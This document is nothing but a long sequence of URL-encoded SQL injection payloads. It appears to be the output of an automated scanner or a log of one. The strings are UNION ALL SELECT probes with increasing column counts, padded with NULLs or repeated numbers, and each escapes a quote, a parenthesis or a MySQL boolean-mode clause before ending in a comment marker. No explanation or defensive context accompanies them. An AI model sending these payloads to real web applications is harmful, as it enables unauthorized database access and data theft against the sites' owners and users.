foo%27%2B%28SELECT%20mkOc%20WHERE%201206%3D1206%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20jUkX%20WHERE%209683%3D9683%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20ZaNW%20WHERE%209044%3D9044%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20FGeN%20WHERE%204312%3D4312%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20IizJ%20WHERE%207111%3D7111%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20WEuq%20WHERE%209071%3D9071%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20DeAU%20WHERE%203096%3D3096%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20jCzA%20WHERE%202683%3D2683%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27pbaj%27%20WHERE%204470%3D4470%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27Ncmh%27%20WHERE%202803%3D2803%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27MSqs%27%20WHERE%209751%3D9751%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27QiiP%27%20WHERE%208177%3D8177%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27sRpm%27%20WHERE%207185%3D7185%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27LJjF%27%20WHERE%204220%3D4220%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27UcUs%27%20WHERE%202015%3D2015%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27Ytap%27%20WHERE%208609%3D8609%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27PTIB%27%20WHERE%208379%3D8379%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27IXdo%27%20WHERE%209798%3D9798%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 -3720%29%20UNION%20ALL%20SELECT%209691%2C9691%2C9691%2C9691%2C9691%2C9691%2C9691%2C9691%2C9691%2C9691%2C9691%2C9691%2C9691%2C9691%2C9691%2C9691%2C9691%2C9691%2C9691%2C9691%2C9691%2C9691%2C9691%2C9691%2C9691%2C9691%2C9691%2C9691%2C9691%2C9691%2C9691%23 -9173%29%20UNION%20ALL%20SELECT%208177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%2C8177%23 -8406%29%20UNION%20ALL%20SELECT%207164%2C7164%2C7164%2C7164%2C7164%2C7164%2C7164%2C7164%2C7164%2C7164%2C7164%2C7164%2C7164%2C7164%2C7164%2C7164%2C7164%2C7164%2C7164%2C7164%2C7164%2C7164%2C7164%2C7164%2C7164%2C7164%2C7164%2C7164%2C7164%2C7164%2C7164%2C7164%2C7164%23 -2709%29%20UNION%20ALL%20SELECT%202422%2C2422%2C2422%2C2422%2C2422%2C2422%2C2422%2C2422%2C2422%2C2422%2C2422%2C2422%2C2422%2C2422%2C2422%2C2422%2C2422%2C2422%2C2422%2C2422%2C2422%2C2422%2C2422%2C2422%2C2422%2C2422%2C2422%2C2422%2C2422%2C2422%2C2422%2C2422%2C2422%2C2422%23 -4383%29%20UNION%20ALL%20SELECT%204827%2C4827%2C4827%2C4827%2C4827%2C4827%2C4827%2C4827%2C4827%2C4827%2C4827%2C4827%2C4827%2C4827%2C4827%2C4827%2C4827%2C4827%2C4827%2C4827%2C4827%2C4827%2C4827%2C4827%2C4827%2C4827%2C4827%2C4827%2C4827%2C4827%2C4827%2C4827%2C4827%2C4827%2C4827%23 -7921%29%20UNION%20ALL%20SELECT%207343%2C7343%2C7343%2C7343%2C7343%2C7343%2C7343%2C7343%2C7343%2C7343%2C7343%2C7343%2C7343%2C7343%2C7343%2C7343%2C7343%2C7343%2C7343%2C7343%2C7343%2C7343%2C7343%2C7343%2C7343%2C7343%2C7343%2C7343%2C7343%2C7343%2C7343%2C7343%2C7343%2C7343%2C7343%2C7343%23 -3626%29%20UNION%20ALL%20SELECT%209664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%23 -5086%29%20UNION%20ALL%20SELECT%206837%2C6837%2C6837%2C6837%2C6837%2C6837%2C6837%2C6837%2C6837%2C6837%2C6837%2C6837%2C6837%2C6837%2C6837%2C6837%2C6837%2C6837%2C6837%2C6837%2C6837%2C6837%2C6837%2C6837%2C6837%2C6837%2C6837%2C6837%2C6837%2C6837%2C6837%2C6837%2C6837%2C6837%2C6837%2C6837%2C6837%2C6837%23 -8744%29%20UNION%20ALL%20SELECT%206062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%2C6062%23 -5160%29%20UNION%20ALL%20SELECT%202664%2C2664%2C2664%2C2664%2C2664%2C2664%2C2664%2C2664%2C2664%2C2664%2C2664%2C2664%2C2664%2C2664%2C2664%2C2664%2C2664%2C2664%2C2664%2C2664%2C2664%2C2664%2C2664%2C2664%2C2664%2C2664%2C2664%2C2664%2C2664%2C2664%2C2664%2C2664%2C2664%2C2664%2C2664%2C2664%2C2664%2C2664%2C2664%2C2664%23 -1261%27%29%20UNION%20ALL%20SELECT%203509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%23 -7694%27%29%20UNION%20ALL%20SELECT%202969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%23 -9434%27%29%20UNION%20ALL%20SELECT%202157%2C2157%2C2157%2C2157%2C2157%2C2157%2C2157%2C2157%2C2157%2C2157%2C2157%2C2157%2C2157%2C2157%2C2157%2C2157%2C2157%2C2157%2C2157%2C2157%2C2157%2C2157%2C2157%2C2157%2C2157%2C2157%2C2157%2C2157%2C2157%2C2157%2C2157%2C2157%2C2157%23 -7738%27%29%20UNION%20ALL%20SELECT%209623%2C9623%2C9623%2C9623%2C9623%2C9623%2C9623%2C9623%2C9623%2C9623%2C9623%2C9623%2C9623%2C9623%2C9623%2C9623%2C9623%2C9623%2C9623%2C9623%2C9623%2C9623%2C9623%2C9623%2C9623%2C9623%2C9623%2C9623%2C9623%2C9623%2C9623%2C9623%2C9623%2C9623%23 -6042%27%29%20UNION%20ALL%20SELECT%203833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%23 -3258%27%29%20UNION%20ALL%20SELECT%201951%2C1951%2C1951%2C1951%2C1951%2C1951%2C1951%2C1951%2C1951%2C1951%2C1951%2C1951%2C1951%2C1951%2C1951%2C1951%2C1951%2C1951%2C1951%2C1951%2C1951%2C1951%2C1951%2C1951%2C1951%2C1951%2C1951%2C1951%2C1951%2C1951%2C1951%2C1951%2C1951%2C1951%2C1951%2C1951%23 -4177%27%29%20UNION%20ALL%20SELECT%205259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%2C5259%23 -7539%27%29%20UNION%20ALL%20SELECT%206264%2C6264%2C6264%2C6264%2C6264%2C6264%2C6264%2C6264%2C6264%2C6264%2C6264%2C6264%2C6264%2C6264%2C6264%2C6264%2C6264%2C6264%2C6264%2C6264%2C6264%2C6264%2C6264%2C6264%2C6264%2C6264%2C6264%2C6264%2C6264%2C6264%2C6264%2C6264%2C6264%2C6264%2C6264%2C6264%2C6264%2C6264%23 -4756%27%29%20UNION%20ALL%20SELECT%209715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%2C9715%23 -1580%27%29%20UNION%20ALL%20SELECT%205576%2C5576%2C5576%2C5576%2C5576%2C5576%2C5576%2C5576%2C5576%2C5576%2C5576%2C5576%2C5576%2C5576%2C5576%2C5576%2C5576%2C5576%2C5576%2C5576%2C5576%2C5576%2C5576%2C5576%2C5576%2C5576%2C5576%2C5576%2C5576%2C5576%2C5576%2C5576%2C5576%2C5576%2C5576%2C5576%2C5576%2C5576%2C5576%2C5576%23 -7054%27%20UNION%20ALL%20SELECT%203346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%23 -5658%27%20UNION%20ALL%20SELECT%208791%2C8791%2C8791%2C8791%2C8791%2C8791%2C8791%2C8791%2C8791%2C8791%2C8791%2C8791%2C8791%2C8791%2C8791%2C8791%2C8791%2C8791%2C8791%2C8791%2C8791%2C8791%2C8791%2C8791%2C8791%2C8791%2C8791%2C8791%2C8791%2C8791%2C8791%2C8791%23 -1863%27%20UNION%20ALL%20SELECT%204340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%23 -9138%27%20UNION%20ALL%20SELECT%204676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%23 -3912%27%20UNION%20ALL%20SELECT%202937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%23 -5084%27%20UNION%20ALL%20SELECT%205189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%2C5189%23 -6580%27%20UNION%20ALL%20SELECT%206826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%2C6826%23 -5370%27%20UNION%20ALL%20SELECT%209209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%2C9209%23 -2975%27%20UNION%20ALL%20SELECT%209571%2C9571%2C9571%2C9571%2C9571%2C9571%2C9571%2C9571%2C9571%2C9571%2C9571%2C9571%2C9571%2C9571%2C9571%2C9571%2C9571%2C9571%2C9571%2C9571%2C9571%2C9571%2C9571%2C9571%2C9571%2C9571%2C9571%2C9571%2C9571%2C9571%2C9571%2C9571%2C9571%2C9571%2C9571%2C9571%2C9571%2C9571%2C9571%23 -7108%27%20UNION%20ALL%20SELECT%205545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%23 -2295%22%20UNION%20ALL%20SELECT%209353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%23 -4553%22%20UNION%20ALL%20SELECT%203856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%23 -6922%22%20UNION%20ALL%20SELECT%204342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%23 -6213%22%20UNION%20ALL%20SELECT%202189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%23 -2968%22%20UNION%20ALL%20SELECT%202028%2C2028%2C2028%2C2028%2C2028%2C2028%2C2028%2C2028%2C2028%2C2028%2C2028%2C2028%2C2028%2C2028%2C2028%2C2028%2C2028%2C2028%2C2028%2C2028%2C2028%2C2028%2C2028%2C2028%2C2028%2C2028%2C2028%2C2028%2C2028%2C2028%2C2028%2C2028%2C2028%2C2028%2C2028%23 -3752%22%20UNION%20ALL%20SELECT%206350%2C6350%2C6350%2C6350%2C6350%2C6350%2C6350%2C6350%2C6350%2C6350%2C6350%2C6350%2C6350%2C6350%2C6350%2C6350%2C6350%2C6350%2C6350%2C6350%2C6350%2C6350%2C6350%2C6350%2C6350%2C6350%2C6350%2C6350%2C6350%2C6350%2C6350%2C6350%2C6350%2C6350%2C6350%2C6350%23 -9310%22%20UNION%20ALL%20SELECT%208825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%2C8825%23 -9540%22%20UNION%20ALL%20SELECT%208022%2C8022%2C8022%2C8022%2C8022%2C8022%2C8022%2C8022%2C8022%2C8022%2C8022%2C8022%2C8022%2C8022%2C8022%2C8022%2C8022%2C8022%2C8022%2C8022%2C8022%2C8022%2C8022%2C8022%2C8022%2C8022%2C8022%2C8022%2C8022%2C8022%2C8022%2C8022%2C8022%2C8022%2C8022%2C8022%2C8022%2C8022%23 